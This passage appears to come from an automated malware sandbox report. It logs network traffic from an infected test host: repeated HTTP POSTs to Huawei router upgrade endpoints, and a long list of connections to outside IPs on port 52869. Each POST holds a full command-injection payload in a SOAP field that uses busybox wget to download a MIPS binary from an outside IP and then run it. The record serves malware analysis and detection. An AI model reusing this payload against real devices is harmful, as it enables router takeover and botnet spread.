huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POSTData Raw: Data Ascii:

Source: global traffic	TCP traffic: 192.168.2.23:34248 -> 194.87.42.3:5555
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.127.166.230:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.181.102.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.204.93.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.98.67.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.38.185.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.39.41.170:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.228.198.88:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.76.106.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.63.8.98:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.215.5.4:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.98.142.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.32.212.42:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.193.84.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.248.153.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.91.55.1:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.136.124.107:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.160.77.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.18.214.192:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.48.120.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.34.161.69:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.85.211.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.67.125.96:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.66.133.168:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.245.107.73:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.124.26.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.87.5.217:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.2.32.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.205.7.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.105.215.210:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.19.25.175:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.105.254.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.73.87.113:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.43.7.174:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.66.7.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.39.228.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.19.148.191:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.94.12.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.42.242.209:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.36.3.160:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.152.88.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.244.87.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.60.120.96:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.238.221.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.242.50.175:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.137.66.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.223.24.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.95.16.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.112.73.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.63.207.92:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.136.141.212:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.205.224.118:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.204.135.168:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.184.99.156:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.151.154.226:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.128.75.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.206.101.127:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.190.25.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.124.47.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.238.177.222:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.177.110.118:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.214.149.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.190.34.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.207.66.22:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.184.72.166:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.189.177.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.186.62.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.96.67.7:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.127.242.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.138.179.154:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.254.196.14:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.180.10.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.248.137.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.6.8.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.207.200.12:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.214.194.194:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.29.143.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.105.126.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.19.186.125:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.212.151.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.24.59.253:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.134.140.161:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.252.151.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.191.179.195:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.13.49.164:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.75.250.217:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.226.220.203:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.202.218.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.219.72.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.192.169.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.55.225.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.104.162.209:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.245.41.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.59.198.101:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.22.179.199:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.174.173.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.39.128.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.119.179.215:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.248.126.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.106.0.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.244.144.241:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.59.176.87:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.198.231.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.131.52.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.24.103.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.217.254.229:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.7.177.158:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.126.165.72:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.245.142.218:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.136.13.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.160.185.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.78.174.72:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.113.15.139:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.199.192.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.23.146.88:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.39.14.151:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.202.130.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.79.119.83:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.207.61.61:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.45.157.216:52869
